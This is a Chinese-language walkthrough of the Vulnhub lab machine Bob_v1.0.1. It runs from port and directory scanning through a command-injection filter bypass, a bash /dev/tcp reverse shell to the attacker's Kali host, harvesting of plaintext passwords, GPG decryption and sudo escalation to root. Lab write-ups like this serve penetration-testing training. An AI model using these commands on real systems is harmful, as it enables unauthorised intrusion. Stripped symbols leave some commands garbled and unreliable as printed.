1. 环境准备与初始信息收集在开始渗透Bob_v1.0.1靶机之前我们需要先搭建好实验环境。这个靶机可以在Vulnhub官网下载直接导入VMware Workstation Pro即可。我建议使用NAT网络模式这样既能保证网络连通性又不会影响本地网络环境。攻击机我选择了Kali Linux 2023.4版本IP地址为192.168.109.128。启动靶机后第一件事就是确定它的IP地址。这里我习惯先用arp-scan扫描整个网段arp-scan -l --interfaceeth0扫描结果显示靶机IP是192.168.109.172。接下来用nmap进行端口扫描这是信息收集阶段最关键的一步nmap -sV -p- 192.168.109.172扫描结果很有意思靶机开放了三个端口21/tcpFTP服务80/tcpHTTP服务25468/tcp修改过的SSH端口看到25468这个非标准SSH端口我马上意识到管理员可能做了安全加固。这种修改默认端口的做法虽然不能完全阻止攻击但确实能减少自动化扫描工具的骚扰。2. Web应用漏洞挖掘与利用访问靶机的80端口发现是一个学校官网。页面看起来很普通但经验告诉我这种看似简单的网站往往暗藏玄机。我首先检查了几个常见页面news.html页面显示网站被黑了但查看源码没发现有用信息login.html页面提示禁止外部登录尝试用X-Forwarded-For伪造IP也没成功这时候就该祭出目录扫描神器了。我习惯先用dirb快速扫描dirb http://192.168.109.172扫描结果中robots.txt文件引起了我的注意。访问后发现列出了几个有趣的文件路径/login.php404未找到/dev_shell.php命令执行接口dev_shell.php这个页面看起来是个开发用的命令行工具。我尝试执行简单的whoami命令发现被过滤了。经过多次测试发现用符号可以绕过过滤cmdwhoami成功执行命令后接下来就是经典的反弹shell操作。在Kali上先监听4444端口nc -lvnp 4444然后在靶机的命令执行接口输入cmdpwdecho bash -i /dev/tcp/192.168.109.128/4444 01 | bash几秒钟后Kali上就收到了来自靶机的shell连接。至此我们成功获得了初始立足点。3. 内网横向移动与敏感信息收集拿到shell后我习惯先做几件事查看当前用户权限检查sudo权限查看家目录内容whoami sudo -l ls -la /home靶机上有四个用户bob、jc、seb和elliot。在bob的家目录发现了一个隐藏文件.old_passwordfile.html里面竟然包含了jc和seb用户的密码这种明文存储密码的做法在现实中也很常见属于典型的安全隐患。检查各用户家目录时在elliot目录下发现theadminisdumb.txt文件内容提到了bob。这提示我们可能需要回到bob的目录深入检查。果然在bob/Documents下发现了三个关键文件staff.txt提到了FTP后门secret.gpg加密的GPG文件Secret目录包含一个可执行文件4. GPG文件解密与权限提升解密secret.gpg文件需要密钥。通过分析Secret目录下的可执行文件发现密钥其实是个藏头诗最终得出密钥是HARPOCRATES。但直接用当前用户解密会报权限错误需要先切换到jc用户su jc gpg --decrypt secret.gpg解密后得到了bob用户的密码。切换到bob用户后检查sudo权限时发现惊喜sudo -l结果显示bob可以无密码执行所有sudo命令这意味着我们可以直接获取root权限sudo -i在根目录下找到flag文件但由于shell环境问题第一次读取失败。改用python获取交互式shell后成功读取python -c import pty; pty.spawn(/bin/bash) cat /root/flag.txt5. 渗透过程中的关键技巧与思考这次渗透有几个值得注意的技术点命令注入绕过使用符号绕过简单过滤敏感信息收集不要忽视任何看似无关的文件GPG解密需要耐心分析线索找到密钥权限提升路径从jc→bob→root的完整链条在实际渗透测试中像Bob这样的靶机很典型看似简单的Web漏洞配合不当的权限配置和敏感信息泄露最终导致了整个系统的沦陷。这提醒我们安全是一个整体任何一个环节的疏忽都可能成为突破口。对于初学者我建议在复现这个靶机时重点关注信息收集的全面性漏洞利用的多种可能性权限提升的思维路径每次渗透测试都是一次学习过程记录下遇到的每个问题和解决方法这些经验在真实环境中会非常宝贵。